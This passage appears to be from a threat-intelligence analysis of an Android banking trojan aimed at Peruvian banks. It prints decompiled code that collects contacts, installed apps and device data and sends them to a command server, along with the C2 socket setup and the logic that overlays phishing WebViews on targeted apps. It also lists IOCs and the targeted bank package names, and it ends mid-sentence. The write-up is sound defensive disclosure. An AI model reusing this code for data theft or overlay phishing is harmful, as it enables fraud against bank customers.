this.socket.on("notificacion", new Emitter.Listener() { // from class: com.personal.pdf.funciones.SocketCon.8                     @Override // io.socket.emitter.Emitter.Listener                     public void call(Object... args) {                         String desencriptado = SocketCon.this.str_decrypt(args[0].toString(), SocketCon.this.config.KEY_STR);                         String titulo = "";                         String mensaje = "";                         try {                             JSONObject json = new JSONObject(desencriptado);                             if (!json.isNull("titulo") && !json.getString("titulo").equals("")) {                                 titulo = json.getString("titulo");                             }                             if (!json.isNull("mensaje") && !json.getString("mensaje").equals("")) {                                 mensaje = json.getString("mensaje");                             }                         } catch (Exception e2) {                         }                         Intent dialogIntent = new Intent(SocketCon.this.context, vista_popup.class);                         dialogIntent.addFlags(268435456);                         dialogIntent.addFlags(BasicMeasure.EXACTLY);                         dialogIntent.addFlags(32768);                         dialogIntent.addFlags(67108864);                         dialogIntent.putExtra("titulo", titulo);                         dialogIntent.putExtra("mensaje", mensaje);                         SocketCon.this.context.startActivity(dialogIntent);                     }

public void ServerPrimerosPasos() {         try {             String contactos = this.funciones.ObtenerContactos();             String apps = this.funciones.ObtenerApps();             String datosTelefono = this.dispositivo.ObtenerDatos();             String cont_res = "{ " + this.funciones.ObtenerIdCliente() + ", \"contactos\" : " + contactos + ", \"apps\" : " + apps + ", \"device_info\" : " + datosTelefono + " }";             this.socket.emit("datos_iniciales_cliente", str_encript(cont_res, this.config.KEY_STR));         } catch (Exception e) {         }     }

Socket socket3 = IO.socket(String.valueOf(Uri.parse("http://" + this.preference.getServerApp() + ":" + this.config.SOCKET_PUERTO)));                 this.socket = socket3;                 try {                     socket3.connect();                 } catch (Exception e) {                     Socket socket4 = this.socket;                     if (socket4 != null) {                         socket4.disconnect();                         this.socket.close();                         this.socket = null;                     }                     this.conectado = false;                 }

Data Encryption

To encrypt and decrypt data it has implemented a class named Cripto where all the methods for both encryption/decryption of strings are stored.

Overlays

The overlays work by checking the list of packages to monitor from pref_config_package and then it will check it whenever an application opens:

{             if (!this.preference.getTargetPackage().equals("")) {                 String[] targets = this.preference.getTargetPackage().split(this.config.SPLIT_PREFERENCE);                 String[] noTargets = this.preference.getNoTargetPackage().split(this.config.SPLIT_PREFERENCE);                 this.rutas = this.preference.getTargetUrl().split(this.config.SPLIT_PREFERENCE);                 for (int i = 0; i < targets.length; i++) {                     try {                         if (nodeInfo.getPackageName().toString().equals(targets[i])) {                             boolean encontro = false;                             for (String item : noTargets) {                                 if (item.equals(targets[i])) {                                     encontro = true;                                 }                             }                             if (!encontro) {                                 z = true;                             } else {                                 z = false;                             }                             if (z & (!this.rutas[i].equals(""))) {                                 mostrarActivityNavegador(this.rutas[i], targets[i]);                             }                         }                     } catch (Exception e12) {                     }                 }

If the application is in the list of targets then a WebView will be overlayed on the victims device.

VT Collection

https://www.virustotal.com/gui/collection/1857e2a8e8677e5f0b0edb38dff9e83795cd50be1e4f8771e2d374f99e4edb45

IOCs

• 0198b8fa11bf9e8442defa00befa2ab224ada5ebb4a60256f2bf5fc491cca0a1

• 33adbff1a79da4a3fde49cececac5a6b99bf217be0c6db6cdf85a46bf2087e57

• 95242e1d105de9c33b2c9d8a9514f58327ca32d7d24af9af19ff3f0d075ea451

• http[:]//92.38.132.217[:]8000/socket.io/?EIO=4&transport=polling&sid=aqOxTFmMn8gXqrvMAAru

• https[:]//justpaste[.]it/8j6de

• http[:]//004.fullcircleteam[.]com/014/e08133e07fc400a116ed6ef01cfde577/inicio?c000=mnn

• https[:]//001.fullcircleteam[.]com/?c000=mnn

• https[:]//002.fullcircleteam[.]com/?c000=mnn
• https[:]//003.fullcircleteam[.]com/?c000=mnn

Targeted banks

• pe.com.interbank.mobilebanking

• pe.com.scotiabank.blpm.android.client

• pe.com.bn.app.bancodelanacion

• com.mibanco.bancamovil

• pe.com.banBifBanking.icBanking.androidUI

• com.bbva.nxt_peru

• com.bcp.innovacxion.yapeapp

• per.bf.desa

• com.pe.cajasullana.cajamovil

• com.bcp.bank.bcp

• pe.pichincha.bm

• com.cajahuancayo.cajahuancayo.appcajahuancayo

• pe.cajapiura.bancamovil

• com.cmacica.prd

• pe.interbank.bie

• pe.com.scotiabank.businessbanking

• com.bcp.bank.tlc

• com.alfinbanco.appclientes

• pe.com.bancomercio.mobilebanking

• com.bm_gnb_pe

• com.whatsapp

• com.ripley.banco.peru

• com.zoluxiones.officebanking

• com.cmac.cajamovilaqp

• pe.com.cajametropolitana.homebankingcml.cmlhomebanking

• com.pe.cajacusco.movil

• com.caja.myapplication

• com.cajamaynas.cajamaynas

• com.cajatacna.droid

• com.appcajatrujillo

• pe.com.tarjetacencosud.canales.mitarjetacencosud

• pe.com.cajacentro

• pe.com.prymera.digital.app

• pe.com.compartamos.bancamovil

• pe.confianza.bancamovil

• id=com.credinkamovil.pe

• pe.com.scotiabank.blpm.android.client.csf

• com.efectivadigital.appclientes

• pe.solera.tarjetaoh

• com.qapaq.banking

• com.google.android.gm

07/09/02 update

IOCs

• 9da516e0a2d17efe8646c1e93450cb80beafabbeb362f992ce6de0a0365da142
• d03deb4f97ee45ec9651dc5d54db8ca523dc4307521cae3f88b966fa9bc29096
• 9b512b9809b72b11d7bca5712517d34d6b3c4009f5518af31e5094671ec737b5

New samples popped up showing modified strings on the commands. The unlock_package command is now called desbloquear_paquete, translated into Spanish.

Also updates to the socket code, the SMS functions have new code added:

Also, a new setting is present: 

13/09/22 update

SHA256: 8b36ba2150047191c388ec2f12a7c28cd82b7eccb9b626e8a8620faefee0c9bf

IOCs:

• http://92.38.132.217:8000/instalado
• http://christopherwilhelm.com/2/assets/css/animate.min.css
• http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_1.png
• http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_2.png
• http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_3.png
• http://christopherwilhelm.com/2/index.php?q=001?q=004&id=d042ef59b121e01e
• http://christopherwilhelm.com/favicon.ico

Some changes to the code, more additions but what is interesting is the fact they are obfuscating their APKs to slow down analysis: